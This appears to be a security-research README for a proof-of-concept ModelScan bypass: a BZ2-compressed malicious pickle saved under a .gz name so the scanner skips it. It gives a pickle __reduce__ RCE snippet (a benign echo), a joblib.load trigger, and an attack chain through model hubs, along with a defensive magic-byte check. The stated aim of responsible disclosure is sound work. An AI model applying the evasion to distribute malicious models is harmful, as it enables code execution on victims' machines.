ModelScan Bypass - Compression Method Mismatch
Security Research - ModelScan Bypass Technique
Overview
This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.
Technique
Compression method mismatch
File extension indicates gzip (.gz) but content is BZ2 compressed
ModelScan Result
SKIPPED - Scanner did not analyze this file
File
exploit_compression_mismatch.joblib.gz
Reproduction Steps
Testing with ModelScan
# Install ModelScan
pip install modelscan
# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_compression_mismatch.joblib.gz
Expected Result
SKIPPED - Scanner did not analyze this file
Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)
import joblib
# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_compression_mismatch.joblib.gz')
Technical Details
This exploit uses Python's pickle __reduce__ method for RCE:
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
Why ModelScan misses this:
The file extension indicates gzip (.gz) but the content is BZ2 compressed, so the scanner does not unpack the pickle inside and reports the file as SKIPPED instead of analyzing it.
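A defensive pre-scan check for exactly this mismatch, added here as an example and not code from this repository or from ModelScan: it sniffs the compression format from the file's magic bytes, compares it with what the extension declares, and returns a fail-closed verdict without ever unpickling anything. The helper names (`sniff_compression`, `check_model_archive`, `make_sample`, `demo`) and the sample bytes are constructed for the example.

```python
import bz2
import os
import tempfile
from typing import Optional

# Magic bytes of the compression formats a model file is commonly wrapped in.
MAGIC = {
    "gzip": b"\x1f\x8b",
    "bz2": b"BZh",
    "xz": b"\xfd7zXZ\x00",
}
# What each extension claims the content is.
EXT_TO_METHOD = {".gz": "gzip", ".bz2": "bz2", ".xz": "xz"}


def sniff_compression(header: bytes) -> Optional[str]:
    """Identify the real compression format from the leading bytes."""
    for name, magic in MAGIC.items():
        if header.startswith(magic):
            return name
    return None


def declared_compression(path: str) -> Optional[str]:
    """Compression format implied by the file extension, if any."""
    return EXT_TO_METHOD.get(os.path.splitext(path)[1].lower())


def check_model_archive(path: str) -> dict:
    """Compare declared vs. actual compression; a mismatch is a finding.
    Only the first 8 bytes are read, so nothing is decompressed or unpickled."""
    with open(path, "rb") as f:
        header = f.read(8)
    declared = declared_compression(path)
    actual = sniff_compression(header)
    mismatch = declared != actual
    # A scanner that opens files by extension would skip such a file;
    # treat that condition as a failed scan (REJECT), never as a pass.
    return {"path": path, "declared": declared, "actual": actual,
            "mismatch": mismatch, "verdict": "REJECT" if mismatch else "SCAN"}


def make_sample(directory: str) -> str:
    """Constructed sample: BZ2 bytes saved under a .gz name, no pickle inside."""
    path = os.path.join(directory, "sample.joblib.gz")
    with open(path, "wb") as f:
        f.write(bz2.compress(b"constructed test bytes, not a pickle"))
    return path


def demo() -> dict:
    """Run the check on the constructed sample in a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        return check_model_archive(make_sample(d))


if __name__ == "__main__":
    print(demo())
```

Wire this in front of the scanner and fail the pipeline whenever the verdict is REJECT or the scanner itself reports SKIPPED.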
Security Impact
Severity: HIGH
Attack Vector:
- Attacker creates malicious model using this technique
- Uploads to model hub (HuggingFace, etc.)
- Victim downloads and scans with ModelScan
- Scanner reports "No issues found!" or skips the file
- Victim loads model → RCE
Part of Larger Research
This is one of four bypass techniques discovered:
- Compression Mismatch
- Double Compression
- Corrupt Header
- Memmap Bypass ⭐ - PRIMARY FINDING
Disclosure
This research is being submitted to Huntr's bug bounty program for responsible disclosure.
Date: December 25, 2024
Researcher: Security Research Team
Disclaimer
⚠️ For Security Research Only
This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.
Status: Under responsible disclosure to Huntr bug bounty program